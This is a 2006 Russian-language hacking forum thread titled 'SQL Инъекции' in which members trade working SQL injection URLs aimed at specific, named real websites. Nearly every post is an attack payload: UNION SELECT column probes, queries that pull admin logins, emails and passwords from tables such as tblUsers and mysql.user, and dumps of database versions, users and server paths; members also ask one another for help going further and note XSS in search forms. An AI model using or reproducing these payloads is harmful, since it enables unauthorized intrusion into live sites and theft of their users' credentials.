SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ka1r

    ka1r New Member

    Joined:
    11 Nov 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    4
    cash

    http://www.emotive.ru/shop/index.php?CID=9999999999+union+select+2,3%20from%20koncert/*
     
    1 person likes this.
  2. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.abcinformation.org/news_display.php?news_id=82+union+select+1,2,3,4,5,6,7,8,9,10/*
    _http://www.impactsoft.ru/news_podr.php?news_id=91+union+select+1,2,3,4,5/*
    _http://www.ratman.tv/news_estesa.php?news_ID=27+union+select+1,2,3,4/*
    _http://www.pariteia.org/news_details.php?news_id=46+union+select+1,2,3,4,5,6,7,8,9/*
    буду благодарен если кто нить в личку напишет вариант развития на одном из примеров, самому пока не удалось.
     
  3. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    http://abcinformation.org/news_display.php?news_id=82+union+select+1,2,concat(id,char(59),answer,char(59),question),4,5,6,7,8,9,10+from+faq/*

    http://abcinformation.org/news_display.php?news_id=82+union+select+1,2,concat(id,char(59),name,char(59),date),4,5,6,7,8,9,10+from+news/*

    http://ratman.tv/news_estesa.php?news_ID=27+union+select+1,2,concat(admin_id,char(59),admin_user,char(59),admin_email),4+from+admin/*


    нашол такие имена таблиц:
    users
    group
    partners
    news
    e-mail
    key
    option
    table
    faq
     
    #143 nc.STRIEM, 4 Dec 2006
    Last edited: 4 Dec 2006
    1 person likes this.
  4. gazta

    gazta Elder - Старейшина

    Joined:
    16 Oct 2005
    Messages:
    35
    Likes Received:
    3
    Reputations:
    -1
    Это за SQL Инъекции сойдёт? http://www.amper-com.ru/index.php?action=GlobalSearch&submit=wgsform&news=on&products=on&articles=on&words='
     
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Редкость на aspx :)

    http://barijessence.com/?Page=ModelShow&ProductID=1+or+1=(select+top+1+UserLoginName%2B':'%2BUserPassword+from+tblUsers+where+id=3)--
     
  6. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    ФК Химки

    _http://www.fckhimki.ru/modules/news/index.php?current_id=1&news_id=514+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
     
  7. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    http://www.hyipranks.com/?a=details&lid=2575+ORDER+BY+3/*
     
  8. cheet

    cheet Banned

    Joined:
    22 Sep 2006
    Messages:
    70
    Likes Received:
    12
    Reputations:
    -8
    http://calipsogold.com/index.php?page='
     
  9. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://ru-hosting.ru/article.php/?sid=999+union+select+null,null,null,null,null,uid+from+users+where+uid=2/*
     
  10. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    http://www.bis-broker.com/sell/offer/?id=-3382%20union%20select%201,2,3,4,5,6,7,8,9,char(106),11,22,33,44,55,66,77,88,99,char(107),111,222,333,444,555,666,777,888,999,char(108),1111,2222,3333,4444,5555,6666--
    Таблица users с полями id, pass, name, email
    Но почему-то если сделать from users, то пропадают результаты. Кто сможет что-то сделать новое, отпишите сюда или в ПМ.
    Спасибо.
     
  11. .::tema::.

    .::tema::. New Member

    Joined:
    2 Dec 2006
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Нашел такую уязвимость SQL:
    http://www.rusfond.ru/thank.html?user_id=hi'1=1--
     
    1 person likes this.
  12. mouse.pro

    mouse.pro Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    113
    Likes Received:
    73
    Reputations:
    14
    http://www.eko.net.ua/index.php?page=docs&id=-26+UNION+SELECT+1,2,3,4,5,6,7,8

    Version: 4.0.21-standard
    Database: eko
    User: eko@localhost
    OS: Unix
    /www/host/eko/htdocs/
     
    1 person likes this.
  13. mouse.pro

    mouse.pro Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    113
    Likes Received:
    73
    Reputations:
    14
    http://www.smotri.te.ua/index.php?inc=catalog&under=-6125+union+select+1,2,3,4/*

    Version: 4.0.21-standard
    Database: smotri
    User: smotri@localhost
    OS: Unix
    /www/host/smotri/htdocs/
     
  14. mouse.pro

    mouse.pro Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    113
    Likes Received:
    73
    Reputations:
    14
    http://www.crimeahouse.ru/index.php?pageId=24&id='2751
    http://www.scoe.org/content.php?PageId=-1+union+select+1/*
    http://www.slc.edu/index.php?pageID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
     
  15. Ded.MCz

    Ded.MCz Member

    Joined:
    16 Jan 2006
    Messages:
    18
    Likes Received:
    19
    Reputations:
    36
    delete...
     
    #155 Ded.MCz, 10 Dec 2006
    Last edited: 18 Nov 2012
  16. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://www.mka.ru/?p=44035'
     
  17. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    _http://altholding.ru/database1.html?firm=-1+union+select+1,convert(user+using+cp1251),convert(version()+using+cp1251),convert(user()+using+cp1251),convert(password+using+cp1251)+from+mysql.user/*&type=2
     
    3 people like this.
  18. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    MTV
    Code:
    http://www.mtvasia.com/ubbthreads2/search.php?Cat=1)+union+select+1/*
     
    1 person likes this.
  19. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    _http://www.kkzmir.ru/gal.php?id=3+union+select+1,USER(),3,4/*
     
  20. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://shop.paintball.ru/index.php?act=ob&id=3+union+select+1,2,3/*
    _http://www.paintball.ru/next.php?id=9+union+select+null,null,null/*
    во всех формах поиска xss

    _http://qwerty.ru/qwerty/antivirus+union+select+1/*
     
    #160 злюка, 14 Dec 2006
    Last edited: 14 Dec 2006
    1 person likes this.
Thread Status:
Not open for further replies.